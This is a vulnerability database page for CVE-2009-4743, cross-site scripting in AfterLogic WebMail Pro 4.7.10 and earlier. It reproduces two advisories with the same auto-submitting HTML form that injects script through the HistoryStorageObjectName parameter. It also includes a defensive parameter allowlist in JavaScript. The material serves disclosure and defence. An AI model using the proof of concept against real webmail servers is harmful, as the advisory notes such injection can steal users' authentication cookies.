CVE-2009-4743
Description
Multiple cross-site scripting (XSS) vulnerabilities in history-storage.aspx in AfterLogic WebMail Pro 4.7.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) HistoryStorageObjectName and (2) HistoryKey parameters.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
AfterLogic WebMail Pro 4.7.10 - Cross-Site Scripting
Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro
Description
-------------
AfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection
of malicious code in the context of the application.
Overview
-----------
Quote from http://www.afterlogic.com/products/webmail-pro :
"Webmail front-end for your existing POP3/IMAP mail server. Offer your users
the fast AJAX webmail and innovative calendar with sharing. Stay in control
with the admin panel and the developer's API."
Details
--------
Vulnerable Product : AfterLogic WebMail Pro <= 4.7.10
Vulnerability Type : Cross-Site Scripting (XSS)
Affected page : history-storage.aspx
Vulnerable parameters : HistoryKey, HistoryStorageObjectName
Discovered by :
Sébastien Duquette (http://intheknow-security.blogspot.com)
Gardien Virtuel (www.gardienvirtuel.com)
Original Advisory :
http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt
Timeline
----------
Bug Discovered : September 18th, 2009
Vendor Advised : September 23rd, 2009
Fix made available : September 30th, 2009
Proof of concept
-------------------
The targeted user must be logged in to the webmail. This proof of concept was
successfully tested in Firefox 3.5 and Internet Explorer 8.
```html
<html>
<head>
</head>
<body onLoad="document.form1.submit()">
<form name="form1" method="post"
      action="http://WEBSITE/history-storage.aspx?param=0.21188772204998574"
      onSubmit="return false;">
<input type="hidden" name="HistoryKey" value="value"/>
<input type="hidden" name="HistoryStorageObjectName" value="location; alert('xss'); //"/>
</form>
</body>
</html>
```
Solution
---------
The vendor has made available a patched version. Update to AfterLogic
Webmail Pro 4.7.11.
AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/36605/info
AfterLogic WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
AfterLogic WebMail Pro 4.7.10 and prior versions are affected.
```html
<html>
<head>
</head>
<body onLoad="document.form1.submit()">
<form name="form1" method="post"
      action="http://www.example.com/history-storage.aspx?param=0.21188772204998574"
      onSubmit="return false;">
<input type="hidden" name="HistoryKey" value="value"/>
<input type="hidden" name="HistoryStorageObjectName" value="location; alert('xss'); //"/>
</form>
</body>
</html>
```
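As an added defensive example (not part of the advisories above and not AfterLogic's code), the following screens the two parameters named in this CVE against a strict identifier allowlist, and shows that HTML entity encoding alone leaves the statement separators in the advisory's test value intact. It assumes both parameters are meant to carry identifier-like names and that the value lands in script context; the page shows neither the server-side code nor the vendor's fix, and `screenBody`, `htmlEncode` and the sample bodies are constructed for illustration.

```javascript
// Added example: request screening for the parameters named in CVE-2009-4743.
// Assumption: both values should be JavaScript-identifier-like names, so an
// allowlist is a valid policy. This is not the vendor's patch.
const SCREENED = ['HistoryKey', 'HistoryStorageObjectName'];
const IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]{0,63}$/;

// HTML entity encoding, included only to show why it is the wrong control
// when a value is written into script context rather than into markup.
function htmlEncode(s) {
  return s.replace(/[&<>"']/g, c => '&#' + c.charCodeAt(0) + ';');
}

// Parse an application/x-www-form-urlencoded body and return every screened
// parameter whose decoded value fails the allowlist. Repeated parameters are
// each checked, so a benign first copy cannot hide a bad second one.
function screenBody(body) {
  const rejected = [];
  for (const [name, value] of new URLSearchParams(body)) {
    if (SCREENED.includes(name) && !IDENTIFIER.test(value)) {
      rejected.push({ name, value });
    }
  }
  return rejected;
}

// Constructed sample bodies (not captured traffic).
const ADVISORY_VALUE = "location; alert('xss'); //"; // test value from the advisory
const benignBody = 'HistoryKey=inbox_12&HistoryStorageObjectName=HistoryStorage';
const advisoryBody = 'HistoryKey=value&HistoryStorageObjectName=' +
  encodeURIComponent(ADVISORY_VALUE);
const repeatedBody = 'HistoryKey=a&HistoryKey=' + encodeURIComponent('b;c');

function demo() {
  return {
    benign: screenBody(benignBody),
    advisory: screenBody(advisoryBody),
    repeated: screenBody(repeatedBody),
    // Quotes become entities, but ';', '(' and ')' pass through unchanged.
    htmlEncoded: htmlEncode(ADVISORY_VALUE),
  };
}

console.log(demo());
```

The allowlist rejects the advisory's value because of the space, `;`, and parentheses, none of which HTML encoding touches.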
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| afterlogic | webmail_pro | <= 4.7.10 | |
| afterlogic | webmail_pro | 4.5 | |
References
- http://osvdb.org/58712
- http://secunia.com/advisories/36964
- http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt
- http://www.securityfocus.com/bid/36605
- https://exchange.xforce.ibmcloud.com/vulnerabilities/53672
CWEs
CWE-79